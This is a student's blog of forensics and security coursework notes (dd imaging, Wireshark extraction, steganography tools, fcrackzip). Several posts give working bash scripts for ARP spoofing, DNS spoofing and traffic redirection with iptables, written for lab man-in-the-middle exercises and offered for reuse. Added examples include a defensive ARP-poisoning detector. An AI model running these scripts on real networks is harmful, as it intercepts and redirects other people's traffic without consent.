Tuesday 12 May 2015

New Language: Python

Last week I decided to delve into the world of Python.
After my Placement Year, I will be starting my Final Year Project.
My project will be software-based and I want to use Python for it. So I thought I'd start learning now!
I couldn't help myself, so I started on the FYP as I was learning. I think it was actually much easier learning the language with an actual objective rather than going through tutorials to learn little bits at a time.

Not sure how much I want to put on here about the FYP I have in mind at the moment as I'd rather not have it copied!

I Have Started My New Job!

I am now a Junior Cyber Security Engineer for a well respected firm in the West Midlands.

My first day was yesterday, which involved the usual: setting up email, setting up the new laptop, getting to know the clients that are on the books, etc.

Tomorrow I am off to Manchester to attend a Cisco Security Workshop!

I will be using this blog to keep track of all the things I will be doing over the next year because at the end of it, I have to write an essay about it, so it will be useful for remembering things!

PS. I hate setting up new computers to get them to exactly how you want them!

Friday 1 May 2015

Placement Year

Pretext: I have mentioned doing another couple of posts about the work I've been doing over the past month, but I haven't gotten around to it with deadlines and stuff. I'll sort them out soon...


I seem to have forgotten to post about my Placement Year.
At my university, I do 2 years, then a "Year in Industry" and then go back for my final year.

I thought I had sorted this before Christmas, but one thing led to another and it didn't pan out!
I kind of pre-empted the first placement falling through, so I started looking for another.

I found one!

Friday 3 April 2015

Effects of Encryption on IT Systems and Digital Investigations

I feel that a lot of my posts on this blog have been Cyber Security related when, theoretically, given the name of my course, "Forensic Computing", it should be based around Forensics!
So it's my "Easter Resolution" to do more forensics posts. Starting with this one.

The title of this post was the title of the essay I had to write. As I said in the other post, I enjoyed doing this essay. It forced me to really look at encryption and learn the ins and outs. Before doing it, I had a general idea of Symmetric and Asymmetric encryption but not the technical details of it.

The breakdown of my essay was something like this:

Ahh The Easter Break...My Work Overview

After completing all the exciting work before Easter (because, well, it was more exciting than the standard essays), I am now left with completing pure essays and not much hands-on Hacking/Forensics!

Currently left to hand in I have:

  • Essay on "The effects of Encryption on IT Systems and Digital Investigations"
  • Essay on "Biometric Spoofing Techniques"
  • A Penetration Testing Methodology
  • A Penetration Testing Report
  • Writing up notes from a Digital Investigation on a suspect's USB stick and network traces.

Wednesday 11 March 2015

Nexpose - New Favourite Toy

I did an essay last semester giving a brief comparison of various vulnerability scanners. I have to admit, I didn't install and try as many as I could, mainly because the essay didn't call for it, but I should have.
If I had, I would have found Nexpose sooner!!!

In our Ethical Hacking module, we have to scan and exploit a target. In reality, this is a VM with Metasploitable installed on it.

However, because we were attacking it from any given location, the IP address associated with each VM had to be accessible outside our closed Forensic Lab network.
This means Nessus was a no-go due to licensing restrictions, and coupled with the fact that OpenVas is such a ball ache, I thought I'd give Nexpose a go.

Thursday 26 February 2015

Using DD Command

So I thought I really should back up the hard drive in my laptop.
I was in a situation today where a 32GB Memory Stick just wasn't big enough (EnCase!!!).

So I bought a 1TB 2.5" drive today and thought it would be a good opportunity to properly use the dd command to take an image of it.

Here is the syntax I used:
dd if=/dev/sda of=/media/DRIVE-LABEL/backup.dd bs=512k

It took the best part of 3 hours to do 250GB over USB.
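Added example (not the author's command or script): the dd line on its own gives no proof that the image is a faithful copy of the drive, which matters for a backup and even more for evidence. The POSIX sh script below uses a constructed 256 KiB file in place of /dev/sda so it runs as a normal user, images it with the same bs=512k, writes a sha256 of the source beside the image and succeeds only when source and image hash identically. The temp directory and file names are assumptions for the demo; on a real machine SRC would be the drive (read as root) and DEST the image on the external disk.

```shell
#!/bin/sh
# Added example, not from the original post. A small file stands in for /dev/sda so
# this runs as a normal user; on a real machine SRC is the drive (needs root) and
# DEST the image on the external disk, as in the dd line above.
WORK=$(mktemp -d)
SRC="$WORK/fake-disk.img"
DEST="$WORK/backup.dd"
# 256 KiB of constructed data, deliberately not a multiple of the 512k block size
dd if=/dev/urandom of="$SRC" bs=4096 count=64 2>/dev/null

# Succeed only if $1 and $2 have the same sha256.
verify_image() {
    [ "$(sha256sum "$1" | cut -d' ' -f1)" = "$(sha256sum "$2" | cut -d' ' -f1)" ]
}

# Image $1 to $2 with dd, record the source hash next to the image in sha256sum -c
# format, then verify. conv=sync is left out on purpose: with bs=512k it would
# zero-pad the last partial block and the hashes would no longer match; if you need
# conv=noerror,sync for a failing disk, use a bs equal to the sector size instead.
image_and_verify() {
    src="$1"; dest="$2"
    dd if="$src" of="$dest" bs=512k 2>/dev/null || return 2
    printf '%s  %s\n' "$(sha256sum "$src" | cut -d' ' -f1)" "$(basename "$dest")" > "$dest.sha256"
    verify_image "$src" "$dest"
}

# Demo run; later, in the image's directory, `sha256sum -c backup.dd.sha256` re-checks it.
if image_and_verify "$SRC" "$DEST"; then
    echo "image verified, sha256 $(cut -d' ' -f1 "$DEST.sha256")"
else
    echo "hash mismatch: $DEST is not a faithful copy of $SRC" >&2
fi
# rm -rf "$WORK" once you are done with the demo files
```

Hashing the source a second time after the copy also catches the case where the drive changed underneath you while dd was running, which is why imaging is normally done with the source mounted read-only or not mounted at all.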

Wednesday 25 February 2015

Why Didn't I Use "Alias" A Lot More Before!?!

I have had a couple of aliases set up for months and months.
I use them all the time, but completely forgot about the actual Alias function and how much time it can save me.

I have gone from having 2/3 to having about 10!

Everything from killing specific processes such as "arpspoof" to quickly "cd" to a favourite folder (my new bash scripts).
I have got a couple for quickly displaying the IPTables and clearing them!

I'm going to put a list below this fold mainly for me to remember them if I ever need them again on someone else's laptop.

Oh The Joys Of OpenVas...

Seeing as OpenVas is meant to be built into Kali, Jesus Christ, it's a pain in the arse to set up!!!!!!!

I've spent hours upon hours over the past few weeks trying to get it going.
Do you think I got it working? Did I ******!!!!

So many errors, not enough storage space on the internet to store all the screenshots of errors I've had recently.

I really wanted it to work because I enjoy using Kali so much. But it just wasn't going to happen.
So I had a look on the OpenVas website and saw that it was a very simple install to get it going on Fedora and some other distros.
So I downloaded Fedora, booted it in a virtual machine, updated Fedora (3 hours!!!) and then ran the command to install OpenVas.

Why did I not do this in the first place!!!!

The install was painless; the setting up took ages as it was downloading the whole internet, I think. Took about 1 hour.

But it works!

SslStrip Bash Script

I had some headaches making this. Figured out I was doing things in the wrong order!!!!!

Right, so, it's not perfect. It's in multiple scripts for the moment whilst I try to figure out a way to get them all running from one script and not having to re-type in port numbers and IPs!

Another DNS Bash Script

I'm having fun with these bash scripts.

This one is one of my favourites, I think; well, it will be when I get it working 100%. A few niggly problems at the moment.

So basically, in the previous one, it redirects the browser to my locally hosted Apache server, which can have anything on it.
However, I wanted to have a little bit more fun than that. I wanted the target to be redirected to a different website.
So if they tried to access "www.bbc.co.uk" they would be redirected to "www.dailymail.co.uk".

I have also added in a line at the end to automatically call the ArpSpoof script.
One major flaw is I can't seem to get it to actually load the website properly. There seems to be a lack of CSS on the page it gets redirected to. I will look into this further......

#!/bin/bash
echo '1' > /proc/sys/net/ipv4/ip_forward
/etc/init.d/apache2 start
iptables -t nat --flush
iptables --zero
echo -e "Enter your interface: wlan0 or eth0"
read NIC
echo -e "Enter Either Your IP - OR IP Of Site To ReDirect Too: EG 192.168.0.4 - OR - 212.58.246.103:80 \n \t\t IF YOU ARE DOING IT TO EXTERNAL IP THEN ADD THE PORT!!!!"
read INTIP
iptables -A FORWARD --in-interface "$NIC" -j ACCEPT
iptables -t nat --append POSTROUTING --out-interface "$NIC" -j MASQUERADE
iptables -t nat -A PREROUTING -p tcp --dport 80 --jump DNAT --to-destination "$INTIP"
sh ./ARPSPOOFBASH

Tuesday 24 February 2015

Modified DNSSpoof Bash Script

This is a slightly modified version of my previous post.
It only spoofs the DNS for a specific URL.
This is better for a MITM attack.

(I should really test this first actually. Oh well....)

#!/bin/bash
echo '1' > /proc/sys/net/ipv4/ip_forward
/etc/init.d/apache2 start
echo -e "REMEMBER TO PERFORM AN ARPSPOOF FIRST OTHERWISE THIS WILL NOT WORK!!!!!!"
echo -e "Please enter your IP and the site you wish to target: EG: 192.168.0.2 www.bbc.co.uk"
read INPUTDNS
echo "$INPUTDNS" > dnsspooftxt.txt
echo -e "Test file:\n\n"
cat dnsspooftxt.txt
echo -e "\n\n Are you using wlan0 or eth0?"
read NIC
echo -e "You Chose:\n"
echo -e "$NIC"
echo -e "Starting DNS Spoof...."
gnome-terminal -x dnsspoof -i "$NIC" -f dnsspooftxt.txt

DNSSpoof Bash Script

This ties into my previous post.
This script does some IPTables commands then calls the previous script to execute the arpspoof.

#!/bin/bash
/etc/init.d/apache2 start
iptables -t nat --flush
iptables --zero
echo -e "Enter your interface: wlan0 or eth0"
read NIC
echo -e "Enter your IP: EG 192.168.0.4"
read INTIP
iptables -A FORWARD --in-interface "$NIC" -j ACCEPT
iptables -t nat --append POSTROUTING --out-interface "$NIC" -j MASQUERADE
iptables -t nat -A PREROUTING -p tcp --dport 80 --jump DNAT --to-destination "$INTIP"
sh ./ARPSPOOFBASH


Enjoy!!

ArpSpoof Bash Script - First Script!

This is my first attempt at a Bash script and I did pretty well, I think.
It's nothing special but it works and saves me about 30 seconds of time!!
I couldn't be bothered to keep typing in commands, and to be honest, I kept forgetting them!!

#!/bin/bash
echo '1' > /proc/sys/net/ipv4/ip_forward
#Ask for 2 IPS
echo -e "Please Enter The HOST IP"
read HOSTIP
echo -e "Please Enter The TARGET IP"
read TARGETIP
echo "You entered: \"$HOSTIP\" \"$TARGETIP\""
echo -e "Are you using wlan0 or eth0?"
read NIC
echo "Preparing........."
echo -e "\t\t Target: $TARGETIP \n"
echo -e "\t\t Host: $HOSTIP \n\n"
echo -e "Starting ArpSpoof"
gnome-terminal -x arpspoof -i "$NIC" -t "$TARGETIP" -r "$HOSTIP"
gnome-terminal --tab -x arpspoof -i "$NIC" -t "$HOSTIP" "$TARGETIP"

Feel free to use it!

Trying A New Terminal - Terminator

So I saw this a while back, and completely forgot about it.
I came across it today whilst I was researching something else and thought I'd give it a go!

Install was easy enough now that it has been added to the Kali native repos.
apt-get install terminator
Installs automatically and it's good to go.
It's located under Accessories.

I ran into an issue. I use the "Open In Terminal" function A LOT!
But after installing Terminator this was broken. Nothing happened. Not even CTRL-ALT-T.

So, after a bit of researching I came up with a solution.
update-alternatives --config x-terminal-emulator
This fixed it!

Sunday 22 February 2015

Extract Zip File From Wireshark

So, I needed to extract a file from a network log file in Wireshark.
Never done it before. Only ever used the "Export Items" function in Wireshark for HTTP items.

I was playing around on Wireshark and actually came up with an answer without Googling!!! Yay me....:)

The item in question was transferred through FTP.
So I filtered for "ftp-data".
I found the right TCP Stream, in this case 307, and right-clicked > Follow TCP Stream.

The box came up. If you press Save As and then name the file "anything.zip", Wireshark will export that TCP stream as a zip file!

Image below:


StegDetect + StegBreak Update

So after all the hassle I had getting this thing set up on Kali, leading to the inevitable giving up and moving to something else, I thought I should do a post reminding me of the commands I used in the end on Deft.

So, the wordlist I originally used kept giving me errors every now and then. So I found another word list and used that instead.
Found from here: https://wiki.skullsecurity.org/Passwords

Note to self, Get a bigger hard drive to download them all on! They are big! :)

Steg Detect

Command:
stegdetect -t p *.jpg
This is used if the method to Steg the file is "jphide".

Steg Break

Command:
stegbreak -f <word list> -t p *.jpg
Again, used if the method to Steg the file is "jphide".

Friday 20 February 2015

Change Root Password Linux

I installed Deft earlier today, and when I first came to log in, I did not want to log in as the user I created during setup; I wanted to be root.
So I selected "Other" from the menu, typed in "root" and typed in the root password for Deft, which is "deft".

Error, Password Not Correct.

Oh...

DEFT Forensics Live Disc

Now I'm a big lover of Kali, especially with the course I am on as it's a good mix between forensics and security.
But a situation came up yesterday where Kali just wasn't cutting it. I did a post about it yesterday.

After playing with the live image, I thought I should install it on a virtual machine and try and use it properly to get a bit of experience with it.

It was extremely quick to install, even when I enabled the option to download updates during installation!

I am going to properly try it out over the next couple of weeks doing my assignment, but first impressions are good!


Deft: http://www.deftlinux.net/

Thursday 19 February 2015

Zip Password Cracker Kali

So I have just extracted a zip file from a Wireshark log file.

I tried to unzip it and it seems to have a password.

I have never used a password cracker in Linux before, so I had a quick Google to see what Kali comes bundled with to do this. I came up with "fcrackzip".

This post is mainly to keep the commands written down somewhere for my own personal use, but it might help someone if they are awful at Googling and can't find what they need in the hundreds of pages talking about fcrackzip.

Stegbreak Segmentation Fault Fix

Well, not exactly a fix, but a small workaround within reason.

I had a lot of trouble getting this to work until I stumbled upon a post explaining why it's not working.
It was on Debian's bug tracker: https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=345230

If you have this issue, it's because your word list contains characters over 127, i.e. bytes outside 7-bit ASCII.

The only option is to run a script that extracts the words made up only of characters with byte values below 128 and puts them into a separate file.

Here is the script (it drops every line containing a byte in the range 128-255):
perl -pe 'BEGIN { @bad = (128..255); map { $_ = chr $_ } @bad; };
undef $_ if /[@bad]/' /usr/share/dict/words > stegbreak.wordlist


Enjoy!
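Added example (not the author's script): the same clean-up as the perl one-liner above, written as a POSIX sh function so it can be pointed at any list rather than only /usr/share/dict/words, and reporting how many lines it dropped so the result can be sanity-checked before the list is used. The five-word sample list is constructed for the demo; the temp directory and output file name are assumptions.

```shell
#!/bin/sh
# Added example, not from the original post. Constructed sample wordlist: three plain
# ASCII words plus "café" and "naïve" written as UTF-8 (bytes 0xC3 0xA9 / 0xC3 0xAF),
# which are exactly the kind of entries the workaround above strips out.
WORK=$(mktemp -d)
printf 'password\ncaf\303\251\nsecret\nna\303\257ve\nletmein\n' > "$WORK/words.txt"

# Copy the lines of $1 that consist only of printable 7-bit ASCII (0x20-0x7E) into $2
# and print how many lines were dropped. LC_ALL=C makes grep work on raw bytes, so
# the range [ -~] can never match 0x80-0xFF; -a stops grep treating the input as binary.
filter_ascii_wordlist() {
    in="$1"; out="$2"
    LC_ALL=C grep -av '[^ -~]' "$in" > "$out" || true   # grep exits 1 when nothing is kept
    total=$(wc -l < "$in"); kept=$(wc -l < "$out")
    echo $((total - kept))
}

# Demo run on the constructed list
dropped=$(filter_ascii_wordlist "$WORK/words.txt" "$WORK/stegbreak.wordlist")
echo "dropped $dropped non-ASCII lines; filtered list in $WORK/stegbreak.wordlist"
```

The count is worth keeping an eye on: a list that loses a large fraction of its lines probably has a different encoding problem (for example a UTF-16 dump) rather than a handful of accented words.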

How To Install Stegdetect In Kali

Don't bother. Give up. It's way too much hassle.

Apart from being extremely hard to find, you have to mess around with moving files here there and everywhere. No one has time for that.

I have spent the majority of the day, from about 11am till about 7pm trying to get it to work.

I am not one to give up, I very rarely give up, but in this case it was the most sensible option because I was literally pulling my hair out and getting frustrated.

Wednesday 18 February 2015

DNS Spoofing

In addition to the Arpspoof blog I posted earlier, here is a post about DNS Spoofing, which ties in with it.
NB. This does NOT work for HTTPS (I will cover this in a separate blog at some point)

All these commands need to be done before the Arpspoof commands are done.

  • /etc/init.d/apache2 start
  • iptables -t nat --flush
  • iptables --zero
  • iptables -A FORWARD --in-interface wlan0 -j ACCEPT
  • iptables -t nat --append POSTROUTING --out-interface wlan0 -j MASQUERADE 
  • iptables -t nat -A PREROUTING -p tcp --dport 80 --jump DNAT --to-destination <yourIP>

This will start the Apache server so you can host the webpage the target will be diverted to.
Location: /root/var/www/index.html

It will then set up all the IPTABLES rules.
Where it says <yourIP> I mean your internal IP.

When you have completed these commands, run the Arpspoof commands in the other post and test it out!!!
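Added example, not part of the original post or of the ArpSpoof and DNSSpoof scripts above: the defender's side of the same setup. When a machine on the LAN answers ARP on the gateway's behalf, the victim's ARP cache ends up with two IPs sharing one MAC, and the gateway's entry no longer carries the MAC it had on a clean network. The POSIX sh script below runs those two checks over a constructed arp -an snapshot (the addresses, the gateway IP and the baseline MAC are made-up demo values); on a real host you would pipe the live output of arp -an into the same functions, and a static ARP entry for the gateway or dynamic ARP inspection on the switch is the usual mitigation.

```shell
#!/bin/sh
# Added detection example, not part of the original post. Constructed sample of
# `arp -an` output as printed by Linux net-tools; NOT a real capture. Entries 1 and 2
# share a MAC, which is the state a victim's ARP cache is left in when another host
# on the LAN answers ARP for the gateway's IP with its own hardware address.
ARP_SNAPSHOT='? (192.168.0.1) at 00:11:22:33:44:55 [ether] on wlan0
? (192.168.0.4) at 00:11:22:33:44:55 [ether] on wlan0
? (192.168.0.7) at 66:77:88:99:aa:bb [ether] on wlan0
? (192.168.0.9) at <incomplete> on wlan0'

# Assumed values: the gateway IP and the MAC it had on a clean network, recorded
# beforehand (e.g. from the router label or a trusted arp -an snapshot).
GATEWAY_IP=192.168.0.1
GATEWAY_MAC_BASELINE=de:ad:be:ef:00:01

# Reads arp -an lines on stdin; prints each MAC mapped to more than one IP, once.
find_duplicate_macs() {
    awk '
        # $2 is "(ip)", $4 is the MAC; "<incomplete>" entries have no colon and are skipped
        $4 ~ /:/ {
            mac = tolower($4); ip = $2
            if (!(mac in first_ip)) { first_ip[mac] = ip; next }
            if (first_ip[mac] != ip && !(mac in reported)) { print mac; reported[mac] = 1 }
        }'
}

# Reads arp -an lines on stdin; succeeds only if the gateway entry is present
# and still carries the baseline MAC.
check_gateway_mac() {
    current=$(awk -v ip="($GATEWAY_IP)" '$2 == ip && $4 ~ /:/ { print tolower($4); exit }')
    [ -n "$current" ] && [ "$current" = "$GATEWAY_MAC_BASELINE" ]
}

# Demo run on the constructed snapshot; on a live host use: arp -an | find_duplicate_macs
printf '%s\n' "$ARP_SNAPSHOT" | find_duplicate_macs | while read -r mac; do
    echo "WARNING: $mac is claimed by more than one IP (possible ARP cache poisoning)"
done
if printf '%s\n' "$ARP_SNAPSHOT" | check_gateway_mac; then
    echo "gateway $GATEWAY_IP MAC matches baseline"
else
    echo "WARNING: gateway $GATEWAY_IP MAC differs from baseline $GATEWAY_MAC_BASELINE"
fi
```

Neither check on its own is conclusive (a replaced router legitimately changes the gateway MAC, and some virtualisation setups share a MAC across addresses), which is why both are reported as warnings to investigate rather than as a verdict.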

Assignments Overview

I mentioned in my first post that I have 7 assignments to complete.
These consist of the following:

2 Digital Investigation styled assignments
1 Assignment based on Encryption
1 Assignment based on Biometrics
1 Presentation based on Biometrics
2 Assignments based on Cyber Security


I have already started on most of these and I don't fancy going back and writing posts about what I've learned with them so far, so when I do a post about them, I will give a quick recap!

Arpspoof Issues and Success

Over the past week, we have been learning about Arp Spoofing and DNS Spoofing.

I didn't fancy doing it the way everyone else was doing it, with PackETH. I wanted to do it the more manual way. I prefer learning to do it the manual way as I think you learn a lot more in the process, even if it is extremely frustrating.

Whilst I started on this last week, I am only writing the blog now (as I only made it 10 mins ago!!), so I can't remember the extent of all the issues I ran into.

What I finally realised was that I was doing the commands wrong. All the tutorials on the internet were obviously using an older version of Arpspoof, as when I finally figured it out, the syntax was different.

Welcome!

I am a Digital Forensics student studying at university in the UK. I also do some Cyber Security modules.
I am currently in my 2nd year.

I have mainly started this to post interesting things I have learned and problems I have encountered.
However, I will use it to do write ups about useful things I want to remember such as commands and tools I have used so I don't forget them! (To be honest, I don't expect anyone to read this!)

I should have started this earlier. I had a plan, before I started Uni to start this from day one. Obviously that did not happen.

So here we are, half way through year 2! Currently, I have around 7 assignments still to complete by April!

As a side note, 99% of my posts are going to be related to tools used within Kali, but some posts will be regarding Windows tools I have to use such as EnCase.
I moved from just using Windows to Linux in Summer 2014, mainly to force myself to learn Linux as I have been putting it off for so long.